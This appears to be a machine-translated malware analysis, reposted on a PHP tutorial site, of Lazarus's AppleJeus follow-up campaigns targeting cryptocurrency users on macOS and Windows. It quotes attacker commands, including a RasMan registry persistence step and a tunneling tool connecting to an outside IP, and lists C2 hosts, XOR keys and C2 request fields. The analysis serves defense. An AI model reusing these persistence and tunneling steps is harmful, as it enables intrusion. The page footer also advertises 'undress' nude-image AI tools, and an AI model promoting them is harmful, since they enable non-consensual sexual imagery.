The Lazarus organization is one of the most active APT organizations currently. In 2018, Kaspersky discovered an attack campaign called AppleJeus launched by this organization. This operation is Lazarus's first attack on macOS users. In order to attack macOS users, Lazarus developed macOS malware and added an authentication mechanism. It can download the payload of the latter stage very carefully and without dropping the disk. Load the next stage payload. To attack Windows users, they developed a multi-stage infection process. After the "AppleJeus" operation analysis was released, Lazarus became more cautious when conducting attacks, adopting more methods to avoid detection.
AppleJeus follow-up
After publishing the analysis of Operation AppleJeus, Lazarus continues to use similar modus operandi to disrupt cryptocurrency businesses, and researchers have discovered more macOS malware similar to that found in AppleJeus of malware. This macOS malware uses public code to develop its installer. The malware uses QtBitcoinTrader developed by Centrabit.
The three macOS installers use similar post-installer scripts to drop payloads and use the same commands when executing the fetched second-stage payload. In addition, another type of macOS malware MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d) was also identified. This malware was created on 2019-03-12, but the network communication was not encrypted. It is speculated that this is an intermediate stage of macOS malware transformation and upgrade.
Changes in Windows Malware
Continuing tracking of this campaign revealed that a victim was attacked by Windows AppleJeus malware in March 2019. It was determined that the infection started with a malicious file named WFCUpdater.exe, and the attackers used a fake website: wfcwallet[.]com.
#The attackers used a multi-stage infection as before, but the method has changed. The infection begins with .NET malware disguised as the WFC wallet updater (a9e960948fdac81579d3b752e49aceda). This .NET file checks whether the command line parameter is "/Embedding" after execution. The malware is responsible for decrypting the WFC.cfg file located in the same folder using a hardcoded 20-byte XOR key (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62). Then connect to the C2 server:
wfcwallet.com (resolved ip: 108.174.195.134)
www.chainfun365.com(resolved ip: 23.254.217.53)
The attacker's command will then be executed to install the next stage payload. The attacker places two files into the victim's system folder: rasext.dll and msctfp.dat. They use the RasMan (Remote Access Connection Manager) Windows service to register the next stage payload. After basic reconnaissance, the attacker manually planted the payload using the following command:
cmd.exe /c dir rasext.dll
cmd.exe /c dir msctfp.dat
cmd.exe /c tasklist /svc | findstr RasMan
cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f
In order to establish a remote tunnel, the attacker used command line parameters to implant more related tools, but the researchers did not obtain more tool files.
Port opener:
%APPDATA%\Lenovo\devicecenter\Device.exe 6378
Tunneling tool:
%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443
macOS Malware Changes
JMTTrading
Tracking this attack A macOS malware variant was discovered during the campaign. The attackers call their fake website and app JMTTrading, and other researchers and security vendors have released extensive technical details. Let me highlight what is different about this attack.
Attackers use GitHub to host their malicious applications.
The malware author used Objective-C instead of the QT framework in his macOS malware.
This malware implements a simple backdoor function in the macOS executable file.
Similar to the previous case, the malware uses a 16-byte XOR key to encrypt/decrypt.
The Windows version of the malware uses ADVobfuscator to hide its code.
The installation script of the macOS malware differs significantly from previous versions.
UnionCryptoTrader
Another attack targeting macOS has also been identified. The malicious program is called UnionCryptoTrader, and security researcher dineshdina04 discovered an identical case. The attack is summarized as follows:
The installation script is the same as the one used by JMTTrading.
The malware author developed this macOS malware using SWIFT.
The malware author changed the method of gathering information from.
The malware starts authenticating using the auth_signature and auth_timestamp parameters in order to deliver the second stage payload.
The malware does not require a disk drop to load the next stage payload.
Windows version of UnionCryptoTrader
Researchers found the Windows version of UnionCryptoTrader (0f03ec3487578cef2398b5b732631fec). It is downloaded from Telegram Messenger and executed:
C:\Users\[user name]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe
Also on the fake website The attacker's Telegram was found, and it is highly confirmed that the attacker used Telegram Messenger to send the installer. Since the payload only executes in memory, all relevant files cannot be fetched. The entire infection process is very similar to WFCWallet, but the injection process is added.
The Windows version of UnionCryptoTrader has the following window showing price charts for several cryptocurrencies.
The Windows version of the UnionCryptoTrader updater (629b9de3e4b84b4a0aa605a3e9471b31) has similar functionality to the macOS version. Based on the build path (Z:\Loader\x64\Release\WinloaderExe.pdb), the malware author refers to this malware as a loader. Once launched, the malware retrieves the victim's basic information and sends it as an HTTP POST.
If the response from the C2 server is 200, the malware decrypts the payload and loads it into memory. Finally the malware sends act=done. The next stage payload downloaded from this loader (e1953fa319cc11c2f003ad0542bca822) is similar to WFCWallet’s .NET downloader. The malware is responsible for decrypting the Adobe.icx file located in the same folder, injecting the next payload into the Internet Explorer process, and executing the attacker's commands.
The final payload (dd03c6eb62c9bf9adaf831f1d7adcbab) is the same as WFCWallet and was planted manually. Malware authors use previously collected information to plant malware that only works on specific systems. The malware checks the infected system's information and compares it with a given value.
The Windows malware loads an encrypted msctfp.dat file into the system folder and loads each configuration. It executes additional commands based on the contents of the file. POST requests with predefined headers are used when the malware communicates with the C2 server.
Initial communication The malware first sends parameters:
cgu: 64bits hexadecimal value from configuration
aip: Configuring MD5 hash of
sv: hardcoded value
If the response from the C2 server is 200, the malware sends the next POST request with encrypted data and a random value to the attacker Use random values to identify each victim and verify POST requests.
imp: randomly generated value
dsh: imp’s XOR value
hb_tp: imp’s XOR value (key: 0x67BF32)
hb_dl : Encrypted data sent to C2 server
ct : Hardcoded value
Finally, the malware downloads the next stage payload, decrypting it.
In addition, while investigating its infrastructure, several fake websites were discovered that are still online.
Summary
AppleJeus follow-up operation found several victims located in the UK, Poland, Russia and China, Some of the victims were linked to cryptocurrency businesses.
The attackers altered the macOS and Windows malware, adding an authentication mechanism to the macOS downloader and changing the macOS development framework. The infection process in Windows systems is different from previous ones. The Lazarus group will continue to conduct attacks for financial gain.
The above is the detailed content of How to conduct AppleJeus action analysis. For more information, please follow other related articles on the PHP Chinese website!

This article examines operational security audit system procurement. It details typical categories (hardware, software, services), budget allocation (CAPEX, OPEX, project, training, contingency), and suitable government contracting vehicles (GSA Sch

This article details crucial security responsibilities for DevOps engineers, system administrators, IT operations staff, and maintenance personnel. It emphasizes integrating security into all stages of the SDLC (DevOps), implementing robust access c

This article explores the roles and required skills of DevOps, security, and IT operations engineers. It details the daily tasks, career paths, and necessary technical and soft skills for each, highlighting the increasing importance of automation, c

This article contrasts Operations Security (OpSec) and Network Security (NetSec) audit systems. OpSec focuses on internal processes, data access, and employee behavior, while NetSec centers on network infrastructure and communication security. Key

This article examines DevSecOps, integrating security into the software development lifecycle. It details a DevOps security engineer's multifaceted role, encompassing security architecture, automation, vulnerability management, and incident response

This article examines essential skills for a successful security operations career. It highlights the need for technical expertise (network security, SIEM, cloud platforms), analytical skills (data analysis, threat intelligence), and soft skills (co

DevOps enhances operational security by automating security checks within CI/CD pipelines, utilizing Infrastructure as Code for improved control, and fostering collaboration between development and security teams. This approach accelerates vulnerabi

This article details operational and maintenance (O&M) security, emphasizing vulnerability management, access control, security monitoring, data protection, and physical security. Key responsibilities and mitigation strategies, including proacti


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.

Dreamweaver Mac version
Visual web development tools

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment

Atom editor mac version download
The most popular open source editor

SublimeText3 Linux new version
SublimeText3 Linux latest version
